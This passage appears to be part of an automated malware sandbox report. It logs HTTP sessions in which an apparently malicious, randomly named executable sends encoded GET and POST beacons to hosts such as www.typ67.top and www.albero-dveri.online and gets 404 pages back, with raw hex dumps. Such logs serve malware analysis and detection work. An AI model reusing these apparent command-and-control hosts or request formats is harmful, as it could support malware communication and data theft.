                                                                                  Sep 25, 2024 09:56:28.174053907 CEST1246INData Raw: ef e0 23 13 fa 7d 4a 54 d0 93 1d 8c dc 8b 73 11 38 4c e1 9c e9 01 64 c1 39 03 c8 9a 93 b6 3c 72 50 8a 02 fe fe 04 c2 a6 33 d2 3d ce 9e 58 7b ed 4d 83 b3 9b 3c e5 44 67 0c 91 6e d5 f9 74 2a 3d a9 4a 4f 5c 41 46 7c 7f f6 d4 4b c0 f4 dc a9 70 95 79
                                                                                  Data Ascii: #}JTs8Ld9<rP3=X{M<Dgnt*=JO\AF|KpynxK//M#lr+qOnD9oe#S_'ct)A7!^q>"H5VDYEuz6b /LWyOY@|/tm]77*rU41
                                                                                  Sep 25, 2024 09:56:28.174067020 CEST1289INHTTP/1.1 404 Not Found
                                                                                  Server: nginx
                                                                                  Date: Wed, 25 Sep 2024 07:56:28 GMT
                                                                                  Content-Type: text/html
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  Content-Encoding: gzip
                                                                                  Data Raw: 65 33 36 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cd 5a 6d 6f db d6 15 fe 9e 5f 71 a3 01 96 94 88 64 9c b4 43 12 4b 72 d3 a4 db 97 b4 1d e0 74 c3 e0 a6 c2 15 75 2d b1 a2 48 8d a4 ec a8 49 80 36 e9 2b 1a 34 68 57 60 43 b1 f7 61 d8 a7 01 89 13 af 6e 5e 9c bf 40 fe a3 3d e7 5c 92 a2 64 c9 71 d2 b4 ab 01 db d2 7d 3d f7 9c e7 3c e7 dc 97 fa d1 8e 6f 47 e3 a1 12 bd 68 e0 36 eb f4 57 d8 ae 0c c3 46 c9 09 5b b2 23 87 91 b3 a9 4a c2 95 5e b7 51 0a 46 25 b4 51 b2 d3 ac 0f 54 24 85 dd 93 41 a8 a2 46 e9 ad 4b bf 30 4e a3 8e 4b 3d 39 50 8d d2 50 06 7d c7 eb 96 84 ed 7b 91 f2 d0 28 50 dd 60 64 04 18 73 ba e5 a6 a3 b6 86 7e 10 15 9a 6e 39 9d a8 d7 e8 a8 4d c7 56 06 7f a9 39 9e 13 39 d2 35 42 5b ba aa b1 8c 21 22 27 72 55 73 6b 6b cb 94 6e 5b 05 be d1 d9 54 81 63 fa 9e eb 78 aa 6e e9 ea 3a be f4 45 a0 dc 46 29 8c c6 ae 0a 7b 4a 61 a6 81 ea 38 b2 51 92 ae 5b 12 bd 40 6d e4 f2 b2 7c 86 1c 45 be 69 87 21 66 99 f4 77 b0 92 ac f5 86 84 68 be 67 e2 cf ea 72 49 90 0a a1 b1 81 ec 2a eb 8a c1 0d 9b f5 d0 0e 9c 61 d4 b4 8e d5 8f [TRUNCATED]
                                                                                  Data Ascii: e36Zmo_qdCKrtu-HI6+4hW`Can^@=\dq}=<oGh6WF[#J^QF%QT$AFK0NK=9PP}{(P`ds~n9MV995B[!"'rUskkn[Tcxn:EF){Ja8Q[@m|Ei!fwhgrI*apc-[fH.#bc{+Gc/7Yu+$L`qh(Rs6TjU!;2(a2C63EH#eTo -gnCJ-2_+,1t'ZnuxTPZi9UGOaq6v5<?""u_{x'~,o;x/M>Hn.~Uo/ypRCjm(g-g3x||-*e%n}7LOn-[XG>jRg79bT-|x#9603t~D31Jw(dxXL?a>g)="3cJH?miEZ@lTy\i{0Pv:T%hZNh=eKX|I+Q`F&s(K&)./|:uS[(d-Z5`3d/QI5B0kx7G^IrS38Zp(978@uS(4B& a27$+8Ib2NaQ [TRUNCATED]


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  25192.168.11.2049781194.58.112.174803276C:\Program Files (x86)\dhRiHTExjJnJkSBdQurHdqlFzJxpfDDcASxxhCLbjCbKzyvQYVLHt\giLTwJlyLWpfb.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Sep 25, 2024 09:56:30.702748060 CEST553OUTGET /7cy1/?Xb3xI=NuunJUERQovrcOQM4pbN0sXyOdFy/3jSqqQUAe4+iYgeK7ulJS9OoncvbeOag3vILBHdN8yfojyADwDpW/rc4czucw94LLL42y8tkGUt2pDt0O2/v+PPRf0=&O4bP=9dRH6ZfHbJX HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Host: www.albero-dveri.online
                                                                                  Connection: close
                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                                  Sep 25, 2024 09:56:30.934695005 CEST1289INHTTP/1.1 404 Not Found
                                                                                  Server: nginx
                                                                                  Date: Wed, 25 Sep 2024 07:56:30 GMT
                                                                                  Content-Type: text/html
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  Data Raw: 32 39 38 61 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 69 73 5f 61 64 61 70 74 69 76 65 22 20 6c 61 6e 67 3d 22 72 75 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 70 61 72 6b 69 6e 67 22 20 63 6f 6e 74 65 6e 74 3d 22 72 65 67 72 75 2d 72 64 61 70 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 74 69 74 6c 65 3e 77 77 77 2e 61 6c 62 65 72 6f 2d 64 76 65 72 69 2e 6f 6e 6c 69 6e 65 3c 2f 74 69 74 6c 65 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 20 68 72 65 66 3d 22 70 61 72 6b 69 6e 67 2d 72 64 61 70 2d 61 75 74 6f 2e 63 73 73 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 66 61 76 69 63 6f 6e 2e 69 63 6f 3f 31 22 20 74 79 70 65 [TRUNCATED]
                                                                                  Data Ascii: 298a<!doctype html><html class="is_adaptive" lang="ru"><head><meta charset="UTF-8"><meta name="parking" content="regru-rdap"><meta name="viewport" content="width=device-width,initial-scale=1"><title>www.albero-dveri.online</title><link rel="stylesheet" media="all" href="parking-rdap-auto.css"><link rel="icon" href="favicon.ico?1" type="image/x-icon"><script>/*<![CDATA[*/window.trackScriptLoad = function(){};/*...*/</script><script onload="window.trackScriptLoad('/manifest.js')" onerror="window.trackScriptLoad('/manifest.js', 1)" src="/manifest.js" charset="utf-8"></script><script onload="window.trackScriptLoad('/head-scripts.js')" onerror="window.trackScriptLoad('/head-scripts.js', 1)" src="/head-scripts.js" charset="utf-8"></script></head><body class="b-page b-page_type_parking b-parking b-parking_bg_light"><header class="b-parking__header b-parking__header_type_rdap"><div class="b-parking__header-note b-text"> &nbsp;<a class="b-link" href="https://r [TRUNCATED]
                                                                                  Sep 25, 2024 09:56:30.934844971 CEST1289INData Raw: 65 6e 74 2d 77 72 61 70 70 65 72 5f 73 74 79 6c 65 5f 69 6e 64 65 6e 74 20 62 2d 70 61 67 65 5f 5f 63 6f 6e 74 65 6e 74 2d 77 72 61 70 70 65 72 5f 74 79 70 65 5f 68 6f 73 74 69 6e 67 2d 73 74 61 74 69 63 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22
                                                                                  Data Ascii: ent-wrapper_style_indent b-page__content-wrapper_type_hosting-static"><div class="b-parking__header-content"><h1 class="b-parking__header-title">www.albero-dveri.online</h1><p class="b-parking__header-description b-text">
                                                                                  Sep 25, 2024 09:56:30.934864998 CEST1289INData Raw: 2d 69 74 65 6d 20 62 2d 70 61 72 6b 69 6e 67 5f 5f 70 72 6f 6d 6f 2d 69 74 65 6d 5f 74 79 70 65 5f 68 6f 73 74 69 6e 67 2d 6f 76 65 72 61 6c 6c 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 2d 70 61 72 6b 69 6e 67 5f 5f 70 72 6f 6d 6f 2d 68 65 61
                                                                                  Data Ascii: -item b-parking__promo-item_type_hosting-overall"><div class="b-parking__promo-header"><span class="b-parking__promo-image b-parking__promo-image_type_hosting"></span><div class="l-margin_left-large"><strong class="b-title b-title_size_large-c
                                                                                  Sep 25, 2024 09:56:30.934876919 CEST1289INData Raw: 6f 6e 5f 74 65 78 74 2d 73 69 7a 65 5f 6e 6f 72 6d 61 6c 20 62 2d 70 61 72 6b 69 6e 67 5f 5f 62 75 74 74 6f 6e 20 62 2d 70 61 72 6b 69 6e 67 5f 5f 62 75 74 74 6f 6e 5f 74 79 70 65 5f 68 6f 73 74 69 6e 67 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a
                                                                                  Data Ascii: on_text-size_normal b-parking__button b-parking__button_type_hosting" href="https://www.reg.ru/hosting/?utm_source=www.albero-dveri.online&utm_medium=parking&utm_campaign=s_land_host&amp;reg_source=parking_auto"> </
                                                                                  Sep 25, 2024 09:56:30.934889078 CEST1289INData Raw: 69 7a 65 5f 6c 61 72 67 65 2d 63 6f 6d 70 61 63 74 22 3e d0 93 d0 be d1 82 d0 be d0 b2 d1 8b d0 b5 20 d1 80 d0 b5 d1 88 d0 b5 d0 bd d0 b8 d1 8f 20 d0 bd d0 b0 26 6e 62 73 70 3b 43 4d 53 3c 2f 73 74 72 6f 6e 67 3e 3c 70 20 63 6c 61 73 73 3d 22 62
                                                                                  Data Ascii: ize_large-compact"> &nbsp;CMS</strong><p class="b-text b-parking__promo-description"> &nbsp;CMS &nbsp;
                                                                                  Sep 25, 2024 09:56:30.934902906 CEST1289INData Raw: 67 26 75 74 6d 5f 63 61 6d 70 61 69 67 6e 3d 73 5f 6c 61 6e 64 5f 62 75 69 6c 64 26 61 6d 70 3b 72 65 67 5f 73 6f 75 72 63 65 3d 70 61 72 6b 69 6e 67 5f 61 75 74 6f 22 3e d0 97 d0 b0 d0 ba d0 b0 d0 b7 d0 b0 d1 82 d1 8c 3c 2f 61 3e 3c 2f 64 69 76
                                                                                  Data Ascii: g&utm_campaign=s_land_build&amp;reg_source=parking_auto"></a></div><div class="b-parking__promo-item b-parking__ssl-protection"><span class="b-parking__promo-image b-parking__promo-image_type_ssl l-margin_right-large"></span> <
                                                                                  Sep 25, 2024 09:56:30.934919119 CEST1289INData Raw: 41 6c 6c 28 20 27 73 70 61 6e 2e 70 75 6e 79 2c 20 73 70 61 6e 2e 6e 6f 2d 70 75 6e 79 27 20 29 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 74 20 3d 20 27 74 65 78 74 43 6f 6e 74 65 6e 74 27 20 69 6e 20 64 6f 63 75 6d 65 6e 74 2e 62 6f 64 79 20 3f
                                                                                  Data Ascii: All( 'span.puny, span.no-puny' ), t = 'textContent' in document.body ? 'textContent' : 'innerText'; var domainName = document.title.match( /(xn--|[0-9]).+\.(xn--)[^\s]+/ )[0]; if ( domainName ) { var d
                                                                                  Sep 25, 2024 09:56:30.934930086 CEST1289INData Raw: 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 61 72 74 69 63 6c 65 3e 3c 73 63 72 69 70 74 20 6f 6e 6c 6f 61 64 3d 22 77 69 6e 64 6f 77 2e 74 72 61 63 6b 53 63 72 69 70 74 4c 6f 61 64 28 27 70 61 72 6b 69 6e 67 2d 72 64 61 70 2d 61 75 74 6f 2e 6a 73 27 29
                                                                                  Data Ascii: div></div></article><script onload="window.trackScriptLoad('parking-rdap-auto.js')" onerror="window.trackScriptLoad('parking-rdap-auto.js', 1)" src="parking-rdap-auto.js" charset="utf-8"></script><script>function ondata(data){ if (
                                                                                  Sep 25, 2024 09:56:30.934941053 CEST485INData Raw: 65 45 6c 65 6d 65 6e 74 28 74 29 2c 61 3d 65 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 74 29 5b 30 5d 2c 6b 2e 61 73 79 6e 63 3d 31 2c 6b 2e 73 72 63 3d 72 2c 61 2e 70 61 72 65 6e 74 4e 6f 64 65 2e 69 6e 73 65 72 74 42 65
                                                                                  Data Ascii: eElement(t),a=e.getElementsByTagName(t)[0],k.async=1,k.src=r,a.parentNode.insertBefore(k,a)}) (window, document, "script", "https://mc.yandex.ru/metrika/tag.js", "ym"); ym(54200914, "init", { clickmap:true, trackLinks:true,


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  26192.168.11.204978238.47.207.146803276C:\Program Files (x86)\dhRiHTExjJnJkSBdQurHdqlFzJxpfDDcASxxhCLbjCbKzyvQYVLHt\giLTwJlyLWpfb.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Sep 25, 2024 09:56:36.406135082 CEST801OUTPOST /qjs8/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Host: www.typ67.top
                                                                                  Origin: http://www.typ67.top
                                                                                  Referer: http://www.typ67.top/qjs8/
                                                                                  Content-Length: 202
                                                                                  Cache-Control: max-age=0
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                                  Data Raw: 58 62 33 78 49 3d 54 68 67 47 5a 49 58 54 72 6d 4e 33 7a 2f 71 4c 33 7a 30 33 6c 41 54 33 54 30 77 56 50 39 6f 41 4f 4d 65 41 63 62 48 4e 7a 68 39 45 35 71 35 32 38 76 42 78 41 75 74 7a 4b 74 36 38 74 30 53 71 43 43 50 66 34 42 71 5a 6c 72 31 64 52 54 34 2b 50 43 41 36 59 5a 67 31 34 6e 59 74 66 72 78 51 41 78 43 51 72 44 4d 59 6f 79 4e 5a 47 38 59 69 66 36 4b 50 30 2f 5a 46 31 63 35 79 62 76 52 43 44 56 55 75 6f 43 39 35 57 59 67 78 64 76 31 6e 4a 4f 41 55 38 50 5a 31 6b 76 4d 78 76 5a 48 64 55 77 58 7a 71 61 4b 78 73 38 53 4f 42 32 32 50 5a 7a 32 53 58 44 41 44 70 46 38 4b 51 33 48 4e 5a 41 3d 3d
                                                                                  Data Ascii: Xb3xI=ThgGZIXTrmN3z/qL3z03lAT3T0wVP9oAOMeAcbHNzh9E5q528vBxAutzKt68t0SqCCPf4BqZlr1dRT4+PCA6YZg14nYtfrxQAxCQrDMYoyNZG8Yif6KP0/ZF1c5ybvRCDVUuoC95WYgxdv1nJOAU8PZ1kvMxvZHdUwXzqaKxs8SOB22PZz2SXDADpF8KQ3HNZA==
                                                                                  Sep 25, 2024 09:56:36.730251074 CEST302INHTTP/1.1 404 Not Found
                                                                                  Server: nginx
                                                                                  Date: Wed, 25 Sep 2024 07:56:36 GMT
                                                                                  Content-Type: text/html
                                                                                  Content-Length: 138
                                                                                  Connection: close
                                                                                  ETag: "66b1b463-8a"
                                                                                  Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e
                                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  27192.168.11.204978338.47.207.146803276C:\Program Files (x86)\dhRiHTExjJnJkSBdQurHdqlFzJxpfDDcASxxhCLbjCbKzyvQYVLHt\giLTwJlyLWpfb.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Sep 25, 2024 09:56:39.255040884 CEST821OUTPOST /qjs8/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Host: www.typ67.top
                                                                                  Origin: http://www.typ67.top
                                                                                  Referer: http://www.typ67.top/qjs8/
                                                                                  Content-Length: 222
                                                                                  Cache-Control: max-age=0
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                                  Data Raw: 58 62 33 78 49 3d 54 68 67 47 5a 49 58 54 72 6d 4e 33 38 36 69 4c 79 51 63 33 6a 67 54 30 4b 30 77 56 57 4e 6f 62 4f 4d 69 41 63 61 44 64 7a 7a 5a 45 34 50 46 32 39 74 35 78 4e 4f 74 7a 53 39 36 31 6a 55 53 31 43 43 44 74 34 42 6d 5a 6c 72 78 64 52 54 6f 2b 50 7a 41 39 5a 4a 67 37 6b 6e 59 72 43 37 78 51 41 78 43 51 72 44 4a 51 6f 79 56 5a 47 49 63 69 66 66 6d 4d 33 2f 59 33 6a 4d 35 79 66 76 52 47 44 56 55 59 6f 44 67 63 57 64 6b 78 64 75 46 6e 49 62 73 54 32 50 5a 7a 70 50 4e 43 67 72 53 51 63 51 76 56 76 39 75 35 6a 75 6d 46 41 67 6e 56 45 42 43 32 55 51 63 78 74 31 46 69 53 31 47 57 45 50 4f 6a 4c 4f 39 46 38 4e 64 46 62 69 4e 64 62 2f 31 61 69 46 73 3d
                                                                                  Data Ascii: Xb3xI=ThgGZIXTrmN386iLyQc3jgT0K0wVWNobOMiAcaDdzzZE4PF29t5xNOtzS961jUS1CCDt4BmZlrxdRTo+PzA9ZJg7knYrC7xQAxCQrDJQoyVZGIciffmM3/Y3jM5yfvRGDVUYoDgcWdkxduFnIbsT2PZzpPNCgrSQcQvVv9u5jumFAgnVEBC2UQcxt1FiS1GWEPOjLO9F8NdFbiNdb/1aiFs=
                                                                                  Sep 25, 2024 09:56:39.585125923 CEST302INHTTP/1.1 404 Not Found
                                                                                  Server: nginx
                                                                                  Date: Wed, 25 Sep 2024 07:56:39 GMT
                                                                                  Content-Type: text/html
                                                                                  Content-Length: 138
                                                                                  Connection: close
                                                                                  ETag: "66b1b463-8a"
                                                                                  Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e
                                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  28192.168.11.204978438.47.207.146803276C:\Program Files (x86)\dhRiHTExjJnJkSBdQurHdqlFzJxpfDDcASxxhCLbjCbKzyvQYVLHt\giLTwJlyLWpfb.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Sep 25, 2024 09:56:42.103002071 CEST1289OUTPOST /qjs8/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Host: www.typ67.top
                                                                                  Origin: http://www.typ67.top
                                                                                  Referer: http://www.typ67.top/qjs8/
                                                                                  Content-Length: 7370
                                                                                  Cache-Control: max-age=0
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                                  Data Raw: 58 62 33 78 49 3d 54 68 67 47 5a 49 58 54 72 6d 4e 33 38 36 69 4c 79 51 63 33 6a 67 54 30 4b 30 77 56 57 4e 6f 62 4f 4d 69 41 63 61 44 64 7a 7a 52 45 34 39 39 32 39 4b 56 78 43 75 74 7a 62 64 36 77 6a 55 53 38 43 42 7a 70 34 42 36 7a 6c 74 74 64 51 77 77 2b 48 6e 55 39 41 35 67 37 76 48 59 71 66 72 78 46 41 78 53 4d 72 44 5a 51 6f 79 56 5a 47 4f 77 69 57 71 4b 4d 78 2f 5a 46 31 63 35 75 62 76 52 36 44 56 73 49 6f 44 56 70 56 75 73 78 63 4f 56 6e 4f 74 34 54 36 50 5a 78 73 50 4e 61 67 72 50 51 63 52 44 52 76 39 7a 73 6a 70 61 46 43 6e 47 78 55 6c 65 53 43 47 52 36 68 56 56 6d 46 6a 50 64 45 4e 69 4b 50 65 64 79 7a 6f 46 4c 52 7a 52 38 63 4f 35 78 32 42 75 75 69 55 33 6c 49 37 45 46 4c 31 74 57 53 39 63 32 78 64 73 30 49 79 71 76 68 6a 31 48 6b 79 52 2f 6a 6c 69 75 56 76 51 30 33 77 77 48 6c 76 57 38 71 6f 35 30 48 53 39 6c 61 68 5a 68 38 56 61 33 59 38 75 79 74 59 59 49 30 6c 56 49 4c 56 46 72 50 34 48 2b 2f 4c 76 47 77 39 69 37 4c 4e 30 65 43 32 71 43 76 55 77 6c 36 43 48 32 35 52 39 4f 57 6a 48 43 [TRUNCATED]
                                                                                  Data Ascii: Xb3xI=ThgGZIXTrmN386iLyQc3jgT0K0wVWNobOMiAcaDdzzRE49929KVxCutzbd6wjUS8CBzp4B6zlttdQww+HnU9A5g7vHYqfrxFAxSMrDZQoyVZGOwiWqKMx/ZF1c5ubvR6DVsIoDVpVusxcOVnOt4T6PZxsPNagrPQcRDRv9zsjpaFCnGxUleSCGR6hVVmFjPdENiKPedyzoFLRzR8cO5x2BuuiU3lI7EFL1tWS9c2xds0Iyqvhj1HkyR/jliuVvQ03wwHlvW8qo50HS9lahZh8Va3Y8uytYYI0lVILVFrP4H+/LvGw9i7LN0eC2qCvUwl6CH25R9OWjHCO4XkJLM8ZRB0VY8YspLIqcTnw+1OEROyGubT0MQZW8v2/QNZnxm0ZJZt+CBdwl82pfNFtbD2qt4hNgNgbDpb/N3FDrGfupmkanNH6ZjyX46NhZu7zvZfm0fbwc2ckrsDV09OBGOk6Qh17Mwi4rLWYB9g1QNULoVfg6kaBMM5xdBjv2XPZOpmE1i0cv0higHSS9AeS3fUYfPCQDFpRxWigflZ0ZbQnuQ+BuKpimW/0xtVSzclHj0KB58NmkgmWkeE0R0VNSp8jqIS9EYvfTzR4QWIY7mLiQSnI4k0WuqtzBB83KqKUTPttvnj+b7BAPAcjA4E3aEd1+a625Up5Q+ozlwJi8xd1cS
                                                                                  Sep 25, 2024 09:56:42.103049994 CEST1289OUTData Raw: 44 2b 50 54 66 71 42 67 36 57 71 39 6b 4b 66 66 4f 36 57 35 6d 58 66 69 66 2b 4d 51 46 52 51 53 4f 6c 41 56 6f 4b 70 68 51 68 54 49 72 5a 37 73 43 4f 41 48 48 4f 6b 44 77 4f 68 39 33 2f 49 4d 61 62 44 4a 51 51 58 2b 51 36 6f 43 4f 71 73 6c 47 38
                                                                                  Data Ascii: D+PTfqBg6Wq9kKffO6W5mXfif+MQFRQSOlAVoKphQhTIrZ7sCOAHHOkDwOh93/IMabDJQQX+Q6oCOqslG8kQDhWgy0pcOPjrv0yjQUiwXALS4TxA+NXKfo0iXNeX+jwcfeqTbJCmx3Q5gGynVKKWmDER1mnWlUXYqAujtb0/seXbnjU5Ggvj9aOm2SbpAxDgHhCkstYoJ0k+KVJEe2NJC1/dodBZc/8E+QFCt1j9I6YLCF1o4Lz
                                                                                  Sep 25, 2024 09:56:42.103101015 CEST5392OUTData Raw: 6d 39 49 4f 74 6a 76 53 55 5a 6c 70 33 76 43 77 56 43 4a 4f 4c 6e 70 79 67 7a 78 41 51 41 6b 64 70 42 2f 6e 53 77 42 6c 59 45 63 35 72 55 54 50 67 4f 51 69 51 2f 78 31 64 6a 79 57 54 79 77 77 79 47 2f 42 79 44 74 68 63 70 46 7a 62 54 57 71 78 6d
                                                                                  Data Ascii: m9IOtjvSUZlp3vCwVCJOLnpygzxAQAkdpB/nSwBlYEc5rUTPgOQiQ/x1djyWTywwyG/ByDthcpFzbTWqxmMYxYZhBtBkN90P7o9FbiQWNM4DkJSflz1102u4Gy6SDK/OeEzEUeexo7mG2aShr6kPdh71ke6yaC157QcKQowvw2j0FLUg8lI1+WmtqyPfQ63aqzpgNR+mZr6NsCLWCICEVs5f15ZhlG0gQ59DKgPgCR3DrEJwKjX
                                                                                  Sep 25, 2024 09:56:42.430553913 CEST302INHTTP/1.1 404 Not Found
                                                                                  Server: nginx
                                                                                  Date: Wed, 25 Sep 2024 07:56:42 GMT
                                                                                  Content-Type: text/html
                                                                                  Content-Length: 138
                                                                                  Connection: close
                                                                                  ETag: "66b1b463-8a"
                                                                                  Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e
                                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  29192.168.11.204978538.47.207.146803276C:\Program Files (x86)\dhRiHTExjJnJkSBdQurHdqlFzJxpfDDcASxxhCLbjCbKzyvQYVLHt\giLTwJlyLWpfb.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Sep 25, 2024 09:56:44.959815979 CEST543OUTGET /qjs8/?Xb3xI=ejIma/W1pGRFx7ChnTgroDHkNn1VdqZgcszQV8LCwj4556o206I/YZ5OId3qzm2jECDslwuStodYNwU7Ng5KBO4as1dQdJVJJimzghFMohwqM9lhe6W/0oM=&O4bP=9dRH6ZfHbJX HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Host: www.typ67.top
                                                                                  Connection: close
                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                                  Sep 25, 2024 09:56:45.292587042 CEST302INHTTP/1.1 404 Not Found
                                                                                  Server: nginx
                                                                                  Date: Wed, 25 Sep 2024 07:56:45 GMT
                                                                                  Content-Type: text/html
                                                                                  Content-Length: 138
                                                                                  Connection: close
                                                                                  ETag: "66b1b463-8a"
                                                                                  Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e
                                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
